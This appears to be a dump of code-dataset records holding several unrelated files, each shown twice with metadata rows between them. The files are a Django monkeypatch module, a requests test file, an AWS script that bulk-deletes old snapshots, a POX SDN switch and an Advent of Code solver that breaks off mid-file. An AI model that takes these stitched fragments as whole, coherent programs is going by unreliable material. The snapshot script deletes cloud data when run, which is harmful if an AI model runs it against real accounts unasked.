def _collect(self, objs, source_attr=None, **kwargs):
for obj in objs:
if source_attr:
# We just added a default of None below and that gets around
# the problem.
self.add_edge(getattr(obj, source_attr, None), obj)
else:
self.add_edge(None, obj)
try:
return super(NestedObjects, self).collect(
objs, source_attr=source_attr, **kwargs)
except models.ProtectedError as e:
self.protected.update(e.protected_objects)
util.NestedObjects.collect = _collect
# Monkey patch for Bug 663236: Make |safe less necessary for form fields
from lib import safe_django_forms
safe_django_forms.monkeypatch()
# Monkey patch django's csrf
import session_csrf
session_csrf.monkeypatch()
| 31.8 | 79 | 0.740659 | from django.forms import fields
from django.forms import widgets
_widget_attrs = fields.Field.widget_attrs
charfield_widget_attrs = fields.CharField.widget_attrs
def required_field_attrs(self, widget):
attrs = field_widget_attrs(self, widget)
if (self.required and (not 'required' in attrs) and
not isinstance(widget, widgets.CheckboxSelectMultiple)):
attrs['required'] = 'required'
return attrs
def required_char_field_attrs(self, widget, *args, **kwargs):
# We need to call super() here, since Django's CharField.widget_attrs
attrs = super(fields.CharField, self).widget_attrs(widget, *args, **kwargs)
original_attrs = charfield_widget_attrs(self, widget) or {}
attrs.update(original_attrs)
return attrs
class DateWidget(fields.DateField.widget):
input_type = 'date'
class TimeWidget(fields.TimeField.widget):
input_type = 'time'
class URLWidget(fields.URLField.widget):
input_type = 'url'
class EmailWidget(fields.EmailField.widget):
input_type = 'email'
fields.Field.widget_attrs = required_field_attrs
fields.CharField.widget_attrs = required_char_field_attrs
fields.DateField.widget = DateWidget
fields.TimeField.widget = TimeWidget
fields.URLField.widget = URLWidget
fields.EmailField.widget = EmailWidget
from django.contrib.admin import util
from django.contrib.admin.util import NestedObjects
from django.db import models
def _collect(self, objs, source_attr=None, **kwargs):
for obj in objs:
if source_attr:
self.add_edge(getattr(obj, source_attr, None), obj)
else:
self.add_edge(None, obj)
try:
return super(NestedObjects, self).collect(
objs, source_attr=source_attr, **kwargs)
except models.ProtectedError as e:
self.protected.update(e.protected_objects)
util.NestedObjects.collect = _collect
from lib import safe_django_forms
safe_django_forms.monkeypatch()
import session_csrf
session_csrf.monkeypatch()
| true | true |
1c332bb22561fec9d19d2aa8adf27d639e17a682 | 2,277 | py | Python | tests/test_structures.py | davidfischer/requests | 7a404cf4ec5aac04d72dc507a981fee944b18cd8 | [
"Apache-2.0"
] | 10 | 2016-08-03T05:10:16.000Z | 2018-04-10T19:36:35.000Z | tests/test_structures.py | davidfischer/requests | 7a404cf4ec5aac04d72dc507a981fee944b18cd8 | [
"Apache-2.0"
] | 25 | 2016-08-24T00:19:19.000Z | 2021-04-17T14:20:24.000Z | tests/test_structures.py | davidfischer/requests | 7a404cf4ec5aac04d72dc507a981fee944b18cd8 | [
"Apache-2.0"
] | 2 | 2019-06-17T11:51:56.000Z | 2020-07-25T08:29:56.000Z | # coding: utf-8
import pytest
from requests.structures import CaseInsensitiveDict, LookupDict
class TestCaseInsensitiveDict:
@pytest.fixture(autouse=True)
def setup(self):
"""
CaseInsensitiveDict instance with "Accept" header.
"""
self.case_insensitive_dict = CaseInsensitiveDict()
self.case_insensitive_dict['Accept'] = 'application/json'
def test_list(self):
assert list(self.case_insensitive_dict) == ['Accept']
possible_keys = pytest.mark.parametrize('key', ('accept', 'ACCEPT', 'aCcEpT', 'Accept'))
@possible_keys
def test_getitem(self, key):
assert self.case_insensitive_dict[key] == 'application/json'
@possible_keys
def test_delitem(self, key):
del self.case_insensitive_dict[key]
assert key not in self.case_insensitive_dict
def test_lower_items(self):
assert list(self.case_insensitive_dict.lower_items()) == [('accept', 'application/json')]
def test_repr(self):
assert repr(self.case_insensitive_dict) == "{'Accept': 'application/json'}"
def test_copy(self):
copy = self.case_insensitive_dict.copy()
assert copy is not self.case_insensitive_dict
assert copy == self.case_insensitive_dict
@pytest.mark.parametrize(
'other, result', (
({'AccePT': 'application/json'}, True),
({}, False),
(None, False)
)
)
def test_instance_equality(self, other, result):
assert (self.case_insensitive_dict == other) is result
class TestLookupDict:
@pytest.fixture(autouse=True)
def setup(self):
"""
LookupDict instance with "bad_gateway" attribute.
"""
self.lookup_dict = LookupDict('test')
self.lookup_dict.bad_gateway = 502
def test_repr(self):
assert repr(self.lookup_dict) == "<lookup 'test'>"
get_item_parameters = pytest.mark.parametrize(
'key, value', (
('bad_gateway', 502),
('not_a_key', None)
)
)
@get_item_parameters
def test_getitem(self, key, value):
assert self.lookup_dict[key] == value
@get_item_parameters
def test_get(self, key, value):
assert self.lookup_dict.get(key) == value
| 28.4625 | 97 | 0.63856 |
import pytest
from requests.structures import CaseInsensitiveDict, LookupDict
class TestCaseInsensitiveDict:
@pytest.fixture(autouse=True)
def setup(self):
self.case_insensitive_dict = CaseInsensitiveDict()
self.case_insensitive_dict['Accept'] = 'application/json'
def test_list(self):
assert list(self.case_insensitive_dict) == ['Accept']
possible_keys = pytest.mark.parametrize('key', ('accept', 'ACCEPT', 'aCcEpT', 'Accept'))
@possible_keys
def test_getitem(self, key):
assert self.case_insensitive_dict[key] == 'application/json'
@possible_keys
def test_delitem(self, key):
del self.case_insensitive_dict[key]
assert key not in self.case_insensitive_dict
def test_lower_items(self):
assert list(self.case_insensitive_dict.lower_items()) == [('accept', 'application/json')]
def test_repr(self):
assert repr(self.case_insensitive_dict) == "{'Accept': 'application/json'}"
def test_copy(self):
copy = self.case_insensitive_dict.copy()
assert copy is not self.case_insensitive_dict
assert copy == self.case_insensitive_dict
@pytest.mark.parametrize(
'other, result', (
({'AccePT': 'application/json'}, True),
({}, False),
(None, False)
)
)
def test_instance_equality(self, other, result):
assert (self.case_insensitive_dict == other) is result
class TestLookupDict:
@pytest.fixture(autouse=True)
def setup(self):
self.lookup_dict = LookupDict('test')
self.lookup_dict.bad_gateway = 502
def test_repr(self):
assert repr(self.lookup_dict) == "<lookup 'test'>"
get_item_parameters = pytest.mark.parametrize(
'key, value', (
('bad_gateway', 502),
('not_a_key', None)
)
)
@get_item_parameters
def test_getitem(self, key, value):
assert self.lookup_dict[key] == value
@get_item_parameters
def test_get(self, key, value):
assert self.lookup_dict.get(key) == value
| true | true |
1c332bd5f1d5fd836763369f4e2ded2d5830f275 | 7,504 | py | Python | CSM_Cleanup.py | LGTOman/CSM_Cleanup | a28445c98213a39735c929825aff7a1a966f05b6 | [
"MIT"
] | null | null | null | CSM_Cleanup.py | LGTOman/CSM_Cleanup | a28445c98213a39735c929825aff7a1a966f05b6 | [
"MIT"
] | null | null | null | CSM_Cleanup.py | LGTOman/CSM_Cleanup | a28445c98213a39735c929825aff7a1a966f05b6 | [
"MIT"
] | null | null | null | import sys
import boto3
from botocore.exceptions import ClientError, EndpointConnectionError
from datetime import datetime, timedelta, timezone
import argparse
import pprint
# Human-readable product name used in CLI help text and all console output.
product = "Dell EMC Cloud Snapshot Manager (aka Amazonite)"
# Default snapshot age (days) beyond which snapshots are removed.
defaultdays = 60
dryrun = False
regions = []

parser = argparse.ArgumentParser(description='Remove snapshots that were abandoned by {product}'.format(product=product))
parser.add_argument('--expire', metavar='DD', type=int, default=defaultdays,
                    help='expire {product} snapshots older than DD days. Default is {defaultdays} days.'.format(
                        product=product,
                        defaultdays=defaultdays,
                    ))
parser.add_argument('--regions', action='store', nargs='+', default=['all'],
                    help='AWS regions to search for {product}. Default is all regions.'.format(product=product))
parser.add_argument('--service', action='store', default='all', choices=['EC2', 'RDS', 'all'],
                    help='Type of snapshot to remove (EC2|RDS|ALL) for {product}. Default is all types.'.format(product=product))
parser.add_argument('--dryrun', action='store_true',
                    help='Dry run only. Do not actually delete snapshots. Default is false.')

args = parser.parse_args()
days = args.expire
dryrun = args.dryrun
service = args.service

# Timezone-aware cutoff: snapshots started before this instant are eligible.
delete_time = datetime.now(timezone.utc) - timedelta(days=days)
# Only EC2 snapshots tagged source=amazonite (i.e. created by CSM) are scanned.
filters = [{'Name':'tag:source', 'Values':['amazonite']}]
# Per-region tallies filled in by the delsnap_* workers, printed in the summary.
sumnum = {}
sumsize = {}

print ()
print ('Deleting any snapshots older than {days} days'.format(days=days))
print ()
def delsnap_ec2 (days, region) :
    """Delete expired CSM-created EC2 snapshots in one region.

    Scans *region* for snapshots tagged ``source=amazonite`` (module-level
    ``filters``) and deletes those started before the module-level
    ``delete_time`` cutoff, honoring the global ``dryrun`` flag.  Always
    records results into ``sumnum[region]``/``sumsize[region]`` ('N/A' on
    access failure) so the end-of-run summary loop never hits a KeyError.

    Note: ``days`` is kept for interface compatibility; the actual cutoff
    is ``delete_time``, computed once at module level from the same value.
    """
    print ('Deleting {product} EC2 snapshots in region {region}'.format(
        region = region,
        product = product,
    ))
    try :
        ec2client = boto3.client('ec2', region_name=region)
    except ClientError as err:
        print ('Unable to access the {region} region.'.format(region=region))
        print ("Error: {0}".format(err))
        sumnum[region] = 'N/A'
        sumsize[region] = 'N/A'
        return
    try :
        ec2snapshots = ec2client.describe_snapshots(Filters=filters)['Snapshots']
    except EndpointConnectionError as err:
        print ('Unable to access the {region} region.'.format(region=region))
        print ("Error: {0}".format(err))
        sumnum[region] = 'N/A'
        sumsize[region] = 'N/A'
        return
    deletion_counter = 0
    size_counter = 0
    # Loop-invariant: one resource handle per region, not one per snapshot.
    ec2 = boto3.resource('ec2', region_name=region)
    for ec2snapshot in ec2snapshots:
        start_time = ec2snapshot['StartTime']
        if start_time < delete_time:
            print ('Deleting {description} EC2 snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
                id=ec2snapshot['SnapshotId'],
                start_time=ec2snapshot['StartTime'],
                volume_size=ec2snapshot['VolumeSize'],
                description=ec2snapshot['Description'],
                region=region,
            ))
            ec2snap = ec2.Snapshot(ec2snapshot['SnapshotId'])
            try:
                ec2response = ec2snap.delete(
                    DryRun=dryrun
                )
                deletion_counter = deletion_counter + 1
                size_counter = size_counter + ec2snapshot['VolumeSize']
            except ClientError as err:
                # With DryRun=True a successful "delete" surfaces as a
                # DryRunOperation error; count it as if it were deleted.
                if err.response['Error']['Code'] == 'DryRunOperation' :
                    print (err.response['Error']['Message'])
                    deletion_counter = deletion_counter + 1
                    size_counter = size_counter + ec2snapshot['VolumeSize']
                else :
                    print ('Unable to delete snapshot {snapshot}.'.format(snapshot=ec2snapshot['SnapshotId']))
                    print ("Error: {0}".format(err))
                    print (err.response['Error']['Code'])
                    # BUGFIX: record partial counts before aborting so the
                    # summary loop does not KeyError on this region.
                    sumnum[region] = deletion_counter
                    sumsize[region] = size_counter
                    return
    print ('Deleted {number} EC2 snapshots totalling {size} GB in region {region}'.format(
        number=deletion_counter,
        size=size_counter,
        region=region,
    ))
    sumnum[region] = deletion_counter
    sumsize[region] = size_counter
def delsnap_rds (days, region) :
    """Delete expired CSM-created RDS snapshots in one region.

    Selects DB snapshots whose identifier starts with the CSM prefixes
    (``cloud-snapshot-manager-`` or ``amazonite-snapshot-``) and whose
    creation time predates the module-level ``delete_time`` cutoff; honors
    the global ``dryrun`` flag.  Always records results into
    ``sumnum[region]``/``sumsize[region]`` ('N/A' on access failure) so the
    summary loop never hits a KeyError -- previously a failed
    delete_db_snapshot call crashed the whole script uncaught.

    Note: ``days`` is kept for interface compatibility; the actual cutoff
    is the module-level ``delete_time``.
    """
    print ('Deleting {product} RDS snapshots in region {region}'.format(
        region=region,
        product=product,
    ))
    rdsclient = boto3.client('rds', region_name=region)
    try :
        rdssnapshots = rdsclient.describe_db_snapshots()['DBSnapshots']
    except EndpointConnectionError as err:
        print ('Unable to access the {region} region.'.format(region=region))
        print ("Error: {0}".format(err))
        sumnum[region] = 'N/A'
        sumsize[region] = 'N/A'
        return
    deletion_counter = 0
    size_counter = 0
    for rdssnapshot in rdssnapshots:
        start_time = rdssnapshot['SnapshotCreateTime']
        if start_time < delete_time and (
                rdssnapshot['DBSnapshotIdentifier'].startswith('cloud-snapshot-manager-') or
                rdssnapshot['DBSnapshotIdentifier'].startswith('amazonite-snapshot-')
        ):
            print ('Deleting {engine} database {dbname} snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
                id=rdssnapshot['DBSnapshotIdentifier'],
                start_time=rdssnapshot['SnapshotCreateTime'],
                volume_size=rdssnapshot['AllocatedStorage'],
                engine=rdssnapshot['Engine'],
                dbname=rdssnapshot['DBInstanceIdentifier'],
                region=region,
            ))
            if not dryrun:
                # BUGFIX: guard the delete so one API error does not abort
                # the run with this region's tallies unrecorded (which made
                # the summary loop raise KeyError).  Mirrors delsnap_ec2.
                try:
                    rdsresponse = rdsclient.delete_db_snapshot(
                        DBSnapshotIdentifier=rdssnapshot['DBSnapshotIdentifier']
                    )
                except ClientError as err:
                    print ('Unable to delete snapshot {snapshot}.'.format(snapshot=rdssnapshot['DBSnapshotIdentifier']))
                    print ("Error: {0}".format(err))
                    sumnum[region] = deletion_counter
                    sumsize[region] = size_counter
                    return
            else :
                print ('Request would have succeeded, but DryRun flag is set.')
            # Count only after the delete succeeded (or dry run confirmed it).
            deletion_counter = deletion_counter + 1
            size_counter = size_counter + rdssnapshot['AllocatedStorage']
    print ('Deleted {number} RDS snapshots totalling {size} GB in region {region}'.format(
        number=deletion_counter,
        size=size_counter,
        region=region,
    ))
    sumnum[region] = deletion_counter
    sumsize[region] = size_counter
# Resolve the region list: expand the 'all' sentinel to every region the
# account can see, otherwise use the user-supplied list.  Sorted either way
# so per-region output and summaries print in a stable order.
if 'all' in args.regions :
    regions = sorted(r['RegionName'] for r in boto3.client('ec2').describe_regions()['Regions'])
else :
    regions = sorted(args.regions)

# Drive each requested service over every region, then print its summary
# from the sumnum/sumsize tallies the workers filled in.
_jobs = (
    ('EC2', delsnap_ec2, 'Summary of EC2 removals:',
     'Deleted {number} snapshots totalling {size} GB in region {region}'),
    ('RDS', delsnap_rds, 'Summary of RDS removals:',
     'Deleted {number} snapshots totaling {size} GB in region {region}'),
)
for _service_name, _worker, _heading, _template in _jobs :
    if (service == _service_name) or (service == 'all') :
        for region in regions :
            _worker (days, region)
        print ()
        print (_heading)
        for region in regions :
            print (_template.format(
                number=sumnum[region],
                size=sumsize[region],
                region=region,
            ))
        print ()
| 34.902326 | 141 | 0.604211 | import sys
import boto3
from botocore.exceptions import ClientError, EndpointConnectionError
from datetime import datetime, timedelta, timezone
import argparse
import pprint
product = "Dell EMC Cloud Snapshot Manager (aka Amazonite)"
defaultdays = 60
dryrun = False
regions = []
parser = argparse.ArgumentParser(description='Remove snapshots that were abandoned by {product}'.format(product=product))
parser.add_argument('--expire', metavar='DD', type=int, default=defaultdays,
help='expire {product} snapshots older than DD days. Default is {defaultdays} days.'.format(
product=product,
defaultdays=defaultdays,
))
parser.add_argument('--regions', action='store', nargs='+', default=['all'],
help='AWS regions to search for {product}. Default is all regions.'.format(product=product))
parser.add_argument('--service', action='store', default='all', choices=['EC2', 'RDS', 'all'],
help='Type of snapshot to remove (EC2|RDS|ALL) for {product}. Default is all types.'.format(product=product))
parser.add_argument('--dryrun', action='store_true',
help='Dry run only. Do not actually delete snapshots. Default is false.')
args = parser.parse_args()
days = args.expire
dryrun = args.dryrun
service = args.service
delete_time = datetime.now(timezone.utc) - timedelta(days=days)
filters = [{'Name':'tag:source', 'Values':['amazonite']}]
sumnum = {}
sumsize = {}
print ()
print ('Deleting any snapshots older than {days} days'.format(days=days))
print ()
def delsnap_ec2 (days, region) :
print ('Deleting {product} EC2 snapshots in region {region}'.format(
region = region,
product = product,
))
try :
ec2client = boto3.client('ec2', region_name=region)
except ClientError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
try :
ec2snapshots = ec2client.describe_snapshots(Filters=filters)['Snapshots']
except EndpointConnectionError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
deletion_counter = 0
size_counter = 0
for ec2snapshot in ec2snapshots:
start_time = ec2snapshot['StartTime']
if start_time < delete_time:
print ('Deleting {description} EC2 snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
id=ec2snapshot['SnapshotId'],
start_time=ec2snapshot['StartTime'],
volume_size=ec2snapshot['VolumeSize'],
description=ec2snapshot['Description'],
region=region,
))
ec2 = boto3.resource('ec2', region_name=region)
ec2snap = ec2.Snapshot(ec2snapshot['SnapshotId'])
try:
ec2response = ec2snap.delete(
DryRun=dryrun
)
deletion_counter = deletion_counter + 1
size_counter = size_counter + ec2snapshot['VolumeSize']
except ClientError as err:
if err.response['Error']['Code'] == 'DryRunOperation' :
print (err.response['Error']['Message'])
deletion_counter = deletion_counter + 1
size_counter = size_counter + ec2snapshot['VolumeSize']
else :
print ('Unable to delete snapshot {snapshot}.'.format(snapshot=ec2snapshot['SnapshotId']))
print ("Error: {0}".format(err))
print (err.response['Error']['Code'])
return
print ('Deleted {number} EC2 snapshots totalling {size} GB in region {region}'.format(
number=deletion_counter,
size=size_counter,
region=region,
))
sumnum[region] = deletion_counter
sumsize[region] = size_counter
def delsnap_rds (days, region) :
print ('Deleting {product} RDS snapshots in region {region}'.format(
region=region,
product=product,
))
rdsclient = boto3.client('rds', region_name=region)
try :
rdssnapshots = rdsclient.describe_db_snapshots()['DBSnapshots']
except EndpointConnectionError as err:
print ('Unable to access the {region} region.'.format(region=region))
print ("Error: {0}".format(err))
sumnum[region] = 'N/A'
sumsize[region] = 'N/A'
return
deletion_counter = 0
size_counter = 0
for rdssnapshot in rdssnapshots:
#start_time = datetime.strptime(
# rdssnapshot['SnapshotCreateTime'],
# '%Y-%m-%dT%H:%M:%S.000Z'
#)
start_time = rdssnapshot['SnapshotCreateTime']
if start_time < delete_time and (
rdssnapshot['DBSnapshotIdentifier'].startswith('cloud-snapshot-manager-') or
rdssnapshot['DBSnapshotIdentifier'].startswith('amazonite-snapshot-')
):
print ('Deleting {engine} database {dbname} snapshot: {id}, created on {start_time} of size {volume_size} GB in {region}'.format(
id=rdssnapshot['DBSnapshotIdentifier'],
start_time=rdssnapshot['SnapshotCreateTime'],
volume_size=rdssnapshot['AllocatedStorage'],
engine=rdssnapshot['Engine'],
dbname=rdssnapshot['DBInstanceIdentifier'],
region=region,
))
deletion_counter = deletion_counter + 1
size_counter = size_counter + rdssnapshot['AllocatedStorage']
# Just to make sure you're reading!
if not dryrun:
rdsresponse = rdsclient.delete_db_snapshot(
DBSnapshotIdentifier=rdssnapshot['DBSnapshotIdentifier']
)
else :
print ('Request would have succeeded, but DryRun flag is set.')
print ('Deleted {number} RDS snapshots totalling {size} GB in region {region}'.format(
number=deletion_counter,
size=size_counter,
region=region,
))
sumnum[region] = deletion_counter
sumsize[region] = size_counter
if 'all' in args.regions :
ec2 = boto3.client('ec2')
response = ec2.describe_regions()
for region in response['Regions']:
regions.append(region['RegionName'])
regions.sort()
else :
regions = sorted(args.regions)
if (service == 'EC2') or (service == 'all') :
for region in regions :
delsnap_ec2 (days,region)
print ()
print ('Summary of EC2 removals:')
for region in regions :
print ('Deleted {number} snapshots totalling {size} GB in region {region}'.format(
number=sumnum[region],
size=sumsize[region],
region=region,
))
print ()
if (service == 'RDS') or (service == 'all') :
for region in regions :
delsnap_rds (days,region)
print ()
print ('Summary of RDS removals:')
for region in regions :
print ('Deleted {number} snapshots totaling {size} GB in region {region}'.format(
number=sumnum[region],
size=sumsize[region],
region=region,
))
print ()
| true | true |
1c332bf5fc4caea777c8a2827663952f8a4ac75d | 3,438 | py | Python | network/sdn/l2_pairs.py | sabertazimi/hust-lab | dc3425b6afe75ac3c1b48bb62fdd27c425284a0f | [
"MIT"
] | 29 | 2017-07-30T07:46:11.000Z | 2021-11-21T15:51:04.000Z | network/sdn/l2_pairs.py | sabertazimi/hust-lab | dc3425b6afe75ac3c1b48bb62fdd27c425284a0f | [
"MIT"
] | 2 | 2018-03-22T10:09:35.000Z | 2021-09-12T16:08:35.000Z | network/sdn/l2_pairs.py | sabertazimi/hust-lab | dc3425b6afe75ac3c1b48bb62fdd27c425284a0f | [
"MIT"
] | 9 | 2018-09-03T13:14:08.000Z | 2021-06-25T17:00:46.000Z | # Copyright 2012 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A super simple OpenFlow learning switch that installs rules for
each pair of L2 addresses.
"""
# These next two imports are common POX convention
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str, str_to_dpid
# Even a simple usage of the logger is much nicer than print!
log = core.getLogger()

# This table maps (switch,MAC-addr) pairs to the port on 'switch' at
# which we last saw a packet *from* 'MAC-addr'.
# (In this case, we use a Connection object for the switch.)
table = {}

# To send out all ports, we can use either of the special ports
# OFPP_FLOOD or OFPP_ALL.  We'd like to just use OFPP_FLOOD,
# but it's not clear if all switches support this, so we make
# it selectable (see launch()).
all_ports = of.OFPP_FLOOD
# Handle messages the switch has sent us because it has no
# matching rule.
def _handle_PacketIn (event):
    """Learn the sender's port; drop h1<->h2 traffic; then either flood
    (unknown destination) or install symmetric flow rules for the MAC pair.
    """
    # Parse packet
    packet = event.parsed

    # Learn the source: remember which port this MAC was last seen on.
    table[(event.connection, packet.src)] = event.port
    dst_port = table.get((event.connection, packet.dst))

    # Drop packets between h1 to h2.
    # NOTE(review): relies on POX IPAddr comparing equal to dotted-quad
    # strings -- confirm.  For non-IP packets nw_src/nw_dst are unset, so
    # both comparisons are False and the packet falls through.
    ip_match = of.ofp_match.from_packet(packet, event.port)
    if (ip_match.nw_src == '192.168.1.1' and ip_match.nw_dst == '192.168.1.2') or (ip_match.nw_src == '192.168.1.2' and ip_match.nw_dst == '192.168.1.1'):
        log.debug("Drop packets between h1 to h2")
        # A packet_out with no actions: the buffered packet is discarded.
        msg = of.ofp_packet_out()
        msg.buffer_id = event.ofp.buffer_id
        msg.in_port = event.port
        event.connection.send(msg)
        return

    if dst_port is None:
        # We don't know where the destination is yet.  So, we'll just
        # send the packet out all ports (except the one it came in on!)
        # and hope the destination is out there somewhere. :)
        msg = of.ofp_packet_out(data = event.ofp)
        msg.actions.append(of.ofp_action_output(port = all_ports))
        event.connection.send(msg)
        log.debug("Installing %s <-> all ports" % packet.src)
    else:
        # Since we know the switch ports for both the source and dest
        # MACs, we can install rules for both directions.
        # First: reverse direction (dst -> src, out the ingress port).
        msg = of.ofp_flow_mod()
        msg.match.dl_dst = packet.src
        msg.match.dl_src = packet.dst
        msg.actions.append(of.ofp_action_output(port = event.port))
        event.connection.send(msg)

        # This is the packet that just came in -- we want to
        # install the rule and also resend the packet.
        msg = of.ofp_flow_mod()
        msg.data = event.ofp  # Forward the incoming packet
        msg.match.dl_src = packet.src
        msg.match.dl_dst = packet.dst
        msg.actions.append(of.ofp_action_output(port = dst_port))
        event.connection.send(msg)

        log.debug("Installing %s <-> %s" % (packet.src, packet.dst))
def launch (disable_flood = False):
    """POX entry point: register the pair-learning switch.

    With *disable_flood* set, packets to unknown destinations go out
    OFPP_ALL rather than OFPP_FLOOD (some switches lack FLOOD support).
    """
    global all_ports
    all_ports = of.OFPP_ALL if disable_flood else all_ports
    core.openflow.addListenerByName("PacketIn", _handle_PacketIn)
    log.info("Pair-Learning switch running.")
| 34.38 | 152 | 0.717859 |
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str, str_to_dpid
log = core.getLogger()
table = {}
# but it's not clear if all switches support this, so we make
all_ports = of.OFPP_FLOOD
def _handle_PacketIn (event):
packet = event.parsed
table[(event.connection, packet.src)] = event.port
dst_port = table.get((event.connection, packet.dst))
ip_match = of.ofp_match.from_packet(packet, event.port)
if (ip_match.nw_src == '192.168.1.1' and ip_match.nw_dst == '192.168.1.2') or (ip_match.nw_src == '192.168.1.2' and ip_match.nw_dst == '192.168.1.1'):
log.debug("Drop packets between h1 to h2")
msg = of.ofp_packet_out()
msg.buffer_id = event.ofp.buffer_id
msg.in_port = event.port
event.connection.send(msg)
return
if dst_port is None:
msg = of.ofp_packet_out(data = event.ofp)
msg.actions.append(of.ofp_action_output(port = all_ports))
event.connection.send(msg)
log.debug("Installing %s <-> all ports" % packet.src)
else:
msg = of.ofp_flow_mod()
msg.match.dl_dst = packet.src
msg.match.dl_src = packet.dst
msg.actions.append(of.ofp_action_output(port = event.port))
event.connection.send(msg)
msg = of.ofp_flow_mod()
msg.data = event.ofp
msg.match.dl_src = packet.src
msg.match.dl_dst = packet.dst
msg.actions.append(of.ofp_action_output(port = dst_port))
event.connection.send(msg)
log.debug("Installing %s <-> %s" % (packet.src, packet.dst))
def launch (disable_flood = False):
global all_ports
if disable_flood:
all_ports = of.OFPP_ALL
core.openflow.addListenerByName("PacketIn", _handle_PacketIn)
log.info("Pair-Learning switch running.")
| true | true |
1c332c87eea00365557e19e91322e96fdb2d1137 | 3,378 | py | Python | day_24/part_1/main.py | MoeFourtyTwo/advent-of-code | 123a716a26add390913eb268a59ef68b45666ef4 | [
"MIT"
] | null | null | null | day_24/part_1/main.py | MoeFourtyTwo/advent-of-code | 123a716a26add390913eb268a59ef68b45666ef4 | [
"MIT"
] | null | null | null | day_24/part_1/main.py | MoeFourtyTwo/advent-of-code | 123a716a26add390913eb268a59ef68b45666ef4 | [
"MIT"
] | null | null | null | from __future__ import annotations
import timeit
import fire
import pandas as pd
from tqdm import tqdm
def main(input_file: str = "input.txt", search_max: bool = True) -> None:
    """Brute-force the AoC 2021 day-24 MONAD program over a table of ALU states.

    Each DataFrame row is one reachable ALU state (registers w/x/y/z) plus
    the model-number prefix ("input") that produced it.  Duplicate register
    states are pruned after every state-changing instruction; each ``inp``
    fans every surviving state out into 9 new ones.  Prints the max (or min,
    if *search_max* is False) accepted model number, i.e. one with z == 0.
    """
    instructions = parse_instructions(input_file)
    alus = pd.DataFrame(
        {
            "w": [0],
            "x": 0,
            "y": 0,
            "z": 0,
            "input": 0,
        }
    )
    t = tqdm(instructions)
    for instruction in t:
        t.set_description(f"Working with {len(alus)} ALUs")
        if len(instruction) == 3:
            instruction, arg_a, arg_b = instruction
            if instruction == "add":
                alus[arg_a] += alus[arg_b]
            elif instruction == "mul":
                alus[arg_a] *= alus[arg_b]
            elif instruction == "mod":
                alus[arg_a] %= alus[arg_b]
                alus = optimize(alus, t)
            elif instruction == "div":
                alus[arg_a] = (alus[arg_a] / alus[arg_b]).astype(int)
                alus = optimize(alus, t)
            elif instruction == "eql":
                alus[arg_a] = (alus[arg_a] == alus[arg_b]).astype(int)
                alus = optimize(alus, t)
            elif instruction == "add_value":
                alus[arg_a] += arg_b
            elif instruction == "mul_value":
                alus[arg_a] *= arg_b
            elif instruction == "mod_value":
                alus[arg_a] %= arg_b
                alus = optimize(alus, t)
            elif instruction == "div_value":
                alus[arg_a] = (alus[arg_a] / arg_b).astype(int)
                alus = optimize(alus, t)
            elif instruction == "eql_value":
                alus[arg_a] = (alus[arg_a] == arg_b).astype(int)
                alus = optimize(alus, t)
        else:
            # "inp" instruction: every surviving state branches into 9
            # (one per digit 1-9).  Digits are tried high-first when
            # searching for the maximum so 'input' stays interpretable.
            alus = optimize(alus, t)
            t.set_description(f"New input data. Increasing number of ALUs to {9 * len(alus)}")
            alus["input"] *= 10
            frames = []
            for i in range(9, 0, -1) if search_max else range(1, 10):
                new_df = alus.copy()
                new_df["input"] += i
                new_df[instruction[1]] = i
                frames.append(new_df)
            # BUGFIX: DataFrame.append was deprecated in pandas 1.4 and
            # removed in 2.0 -- build the expanded table with pd.concat.
            alus = pd.concat(frames, ignore_index=True)
            alus = optimize(alus, t)

    valid_rows = alus[alus["z"] == 0]
    print(f"Value: {valid_rows['input'].max() if search_max else valid_rows['input'].min()}")
def optimize(alus: pd.DataFrame, t) -> pd.DataFrame:
    """Prune ALU states whose (w, x, y, z) registers duplicate an earlier row.

    Deduplicates in place (first occurrence wins) and returns the same frame;
    *t* is the tqdm bar, used only for progress messages.
    """
    t.set_description(f"Optimizing {len(alus)} ALUs")
    register_columns = ["w", "x", "y", "z"]
    alus.drop_duplicates(subset=register_columns, inplace=True)
    t.set_description(f"Working with {len(alus)} ALUs")
    return alus
def parse_instructions(input_file: str) -> list[tuple[str, str] | tuple[str, str, str | int]]:
with open(input_file) as f:
lines = f.read().splitlines()
instructions = []
for line in lines:
instruction, *args = line.split()
if len(args) == 2:
arg_a, arg_b = args
if arg_b in "wxzy":
instructions.append((instruction, arg_a, arg_b))
else:
instructions.append((instruction + "_value", arg_a, int(arg_b)))
else:
instructions.append((instruction, args[0]))
return instructions
if __name__ == "__main__":
    # python-fire maps CLI flags onto main()'s keyword arguments; timeit
    # reports the total wall-clock seconds of the single run.
    print(timeit.Timer(lambda: fire.Fire(main)).timeit(1))
| 35.1875 | 94 | 0.530491 | from __future__ import annotations
import timeit
import fire
import pandas as pd
from tqdm import tqdm
def main(input_file: str = "input.txt", search_max: bool = True) -> None:
instructions = parse_instructions(input_file)
alus = pd.DataFrame(
{
"w": [0],
"x": 0,
"y": 0,
"z": 0,
"input": 0,
}
)
t = tqdm(instructions)
for instruction in t:
t.set_description(f"Working with {len(alus)} ALUs")
if len(instruction) == 3:
instruction, arg_a, arg_b = instruction
if instruction == "add":
alus[arg_a] += alus[arg_b]
elif instruction == "mul":
alus[arg_a] *= alus[arg_b]
elif instruction == "mod":
alus[arg_a] %= alus[arg_b]
alus = optimize(alus, t)
elif instruction == "div":
alus[arg_a] = (alus[arg_a] / alus[arg_b]).astype(int)
alus = optimize(alus, t)
elif instruction == "eql":
alus[arg_a] = (alus[arg_a] == alus[arg_b]).astype(int)
